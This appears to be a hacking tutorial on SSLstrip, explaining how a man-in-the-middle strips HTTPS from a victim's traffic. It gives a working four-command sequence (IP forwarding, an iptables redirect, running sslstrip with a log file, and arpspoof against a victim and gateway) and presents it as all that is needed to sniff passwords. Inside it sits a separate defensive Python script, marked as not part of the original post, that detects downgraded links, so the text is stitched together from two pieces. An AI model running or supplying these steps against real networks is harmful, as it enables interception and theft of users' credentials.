
SSLstrip - SSL Hijacking Tool

HTTPS can easily be defeated by a man-in-the-middle (MITM) using SSLstrip. It transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, then maps those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Here is how the exploit works: sitting in the middle, the attacker forces the client to operate in unencrypted mode by stripping the "s" from every "HTTPS" found in the headers and HTML.


The hacker gets the plain-text credentials, connects to the server via HTTPS using those credentials, gets the response, decrypts it, and forwards that back to the client. Thus, the server is satisfied, since everything is "correctly" encrypted, while the client is forced to use an unencrypted communication channel, without even noticing it.
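A defender-side check for the rewriting described above, as an added example that is not part of the original post: it compares a known-good copy of a page (assumed to have been fetched over a trusted path) with the copy a client received, and reports link targets that went from https to http or disappeared. The function names, hosts and sample HTML are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Attribute values that carry navigation or form-submission targets.
URL_ATTR = re.compile(r"""(?:href|src|action)\s*=\s*["']([^"']+)["']""", re.I)

# Constructed sample pages (hypothetical hosts): trusted copy vs. copy seen by a client.
TRUSTED_HTML = """<a href="https://bank.example/login">Sign in</a>
<form action="https://bank.example/auth" method="post"></form>
<a href="https://bank.example/account">Account</a>
<a href="http://bank.example/help">Help</a>"""
OBSERVED_HTML = """<a href="http://bank.example/login">Sign in</a>
<form action="http://bank.example/auth" method="post"></form>
<a href="https://bank-example.test/account">Account</a>
<a href="http://bank.example/help">Help</a>"""

def links_by_scheme(html):
    """Map scheme -> set of (host, path, query) for absolute http(s) URLs."""
    found = {"http": set(), "https": set()}
    for value in URL_ATTR.findall(html):
        parts = urlsplit(value.strip())
        scheme = parts.scheme.lower()
        if scheme in found and parts.netloc:
            found[scheme].add((parts.netloc.lower(), parts.path or "/", parts.query))
    return found

def _as_https(targets):
    return sorted("https://%s%s%s" % (h, p, "?" + q if q else "") for (h, p, q) in targets)

def find_downgrades(trusted_html, observed_html):
    """Targets that are https-only in the trusted copy but http in the observed copy."""
    trusted, observed = links_by_scheme(trusted_html), links_by_scheme(observed_html)
    # A target the site itself also links over http is not evidence of stripping.
    https_only = trusted["https"] - trusted["http"]
    return _as_https(https_only & observed["http"])

def find_missing(trusted_html, observed_html):
    """https targets absent from the observed copy (e.g. swapped for a look-alike host)."""
    trusted, observed = links_by_scheme(trusted_html), links_by_scheme(observed_html)
    return _as_https(trusted["https"] - observed["https"] - observed["http"])

if __name__ == "__main__":
    print("downgraded:", find_downgrades(TRUSTED_HTML, OBSERVED_HTML))
    print("missing:   ", find_missing(TRUSTED_HTML, OBSERVED_HTML))
```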



Basically, these are the things you need to do to get SSLstrip running on BackTrack.

1- Switch the attacker machine into IP forwarding mode so that it can forward the victim's packets to the right address.
    echo "1" > /proc/sys/net/ipv4/ip_forward

2- Set up iptables to redirect HTTP traffic to SSLstrip, so that all traffic destined for port 80 is redirected to port 10000 (or any other port you wish to use, e.g. 8080).
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

3- Run SSLstrip and log to a file named secret
    python sslstrip.py -w secret

4- Run an arpspoof attack between the victim and the gateway
    arpspoof -i eth0 -t 192.168.1.6 192.168.1.1




That is really all that we have to do to compromise a network and sniff usernames and passwords. It takes only a few commands on a Linux machine to steal your "secure" information.
